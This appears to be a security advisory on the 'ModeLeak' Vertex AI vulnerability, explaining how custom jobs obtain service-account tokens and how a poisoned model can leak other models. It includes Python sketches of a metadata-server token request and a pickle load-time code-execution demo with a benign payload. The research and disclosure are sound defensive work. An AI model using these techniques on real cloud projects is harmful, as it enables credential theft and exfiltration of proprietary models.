ModeLeak: LLM Model Exfiltration Vulnerability in Vertex AI
Published Tue, Nov 12th, 2024
Summary
A vulnerability in GCP's Vertex AI service allows privilege escalation and unauthorized access to sensitive LLM models. Attackers can exfiltrate these models by exploiting misconfigurations in access controls and service bindings.
By abusing the permissions granted to Vertex AI custom jobs, researchers were able to escalate their privileges and gain unauthorized access to all data services in the project.
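The escalation works because a custom job's code runs under the project's attached service-account identity, so anything executing inside the job can request that account's OAuth token from the standard GCE metadata server. A minimal sketch of that step (the endpoint and `Metadata-Flavor` header are the documented GCP metadata API; fetching a token only succeeds from inside GCP, e.g. within a custom-job container):

```python
import json
import urllib.request

# Standard GCE metadata endpoint for the attached service account's token.
METADATA_TOKEN_URL = (
    "http://metadata.google.internal/computeMetadata/v1/"
    "instance/service-accounts/default/token"
)


def build_token_request() -> urllib.request.Request:
    """Build the request a custom job's payload would send to obtain the
    service-account token; the Metadata-Flavor header is mandatory."""
    return urllib.request.Request(
        METADATA_TOKEN_URL, headers={"Metadata-Flavor": "Google"}
    )


def fetch_access_token() -> str:
    """Works only when run inside GCP (e.g. a Vertex AI custom job)."""
    with urllib.request.urlopen(build_token_request()) as resp:
        return json.load(resp)["access_token"]
```

With that token, the job's code can call any GCP API the service account is permitted to use, which is what turns a "run a training job" permission into project-wide data access.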
In addition, deploying a poisoned model in Vertex AI enabled the exfiltration of all other fine-tuned models in the project, putting proprietary model weights and the sensitive data they encode at risk.
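The poisoned-model step is possible because common model serialization formats execute code at load time, so the serving environment that deserializes an attacker-supplied model runs the attacker's payload with that environment's credentials. A self-contained illustration of the underlying mechanism using Python's pickle format (a hedged sketch of the class of technique, not the researchers' actual payload; the harmless payload here just reads an environment variable):

```python
import os
import pickle


class PoisonedModel:
    """Stand-in for a serialized 'model': on unpickling, Python calls the
    callable returned by __reduce__, executing attacker-chosen code."""

    def __reduce__(self):
        # Benign demo payload: read an env var. A real payload could
        # enumerate and exfiltrate every model the serving account can see.
        return (os.getenv, ("HOME",))


blob = pickle.dumps(PoisonedModel())  # the "model file" an attacker uploads
loaded = pickle.loads(blob)           # "loading the model" runs the payload
# `loaded` is the payload's return value, not a PoisonedModel instance.
```

This is why deploying an untrusted model is equivalent to granting it code execution: the deserializer, not the model's prediction code, is where the payload fires.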